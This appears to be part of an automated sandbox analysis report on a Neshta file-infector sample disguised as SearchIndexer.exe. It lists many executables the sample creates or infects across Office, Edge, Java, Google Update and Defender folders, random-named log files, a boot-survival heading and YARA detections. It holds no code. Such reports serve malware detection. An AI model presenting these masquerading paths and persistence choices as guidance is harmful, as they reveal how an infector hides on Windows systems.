Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\anplGAHn.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\ZCiUQOvV.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\QNsVGKUC.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\SPfDctZy.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\VMrdIRuc.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Windows\svchost.com	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\tHZIVhBi.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\VrnUzURu.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\iTuSlVGA.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\aViTseNl.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\MrGoJLyr.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\oVvrynel.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\zpVYYBvm.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\wNNHBaEp.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\EcnWByLa.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\hctSEgaX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\MIUEPsLM.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\PbyWKVQt.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\NfKwuYup.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\KyrFXOMt.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\AutoIt3\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\giPBeHvH.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\zAChyMGX.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\SBxdsXQA.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\OtzUWFWF.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\cqPBhmEa.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE	Jump to dropped file

Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Windows\svchost.com	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\aViTseNl.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\anplGAHn.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\OtzUWFWF.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\oJaATZbJ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\VrnUzURu.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\MIUEPsLM.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\CaAofPGe.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\lSjJLcbQ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\SBxdsXQA.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\zpVYYBvm.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\hctSEgaX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\EcnWByLa.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\LabWdNFO.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\QNsVGKUC.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\SPfDctZy.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\zysYIoOi.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\wNNHBaEp.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\cqPBhmEa.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\BAeGeXTe.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\sRLquvOw.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\YAYKaqDh.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\QWQVqwoz.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\kpEaCKQF.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\WqYmKtXd.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\tHZIVhBi.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\iTuSlVGA.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\zAChyMGX.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\giPBeHvH.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\PbyWKVQt.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\DiJGaagK.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\csYLXLvO.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\rOKZjkQk.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\ZCiUQOvV.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\VMrdIRuc.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\uWHiFCKf.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\IniXRspB.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\oVvrynel.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\NfKwuYup.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\TYnVXEze.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\jzkKkMJA.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\yVVZwldW.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\MrGoJLyr.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\KyrFXOMt.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\YUdUknhP.log	Jump to dropped file

Boot Survival

Yara detected Neshta

Source: Yara match	File source: SearchIndexer.exe, type: SAMPLE
Source: Yara match	File source: 0.0.SearchIndexer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000034.00000002.2186722542.0000000000409000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2762934153.0000000000409000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SearchIndexer.exe PID: 6636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.com PID: 9192, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE, type: DROPPED
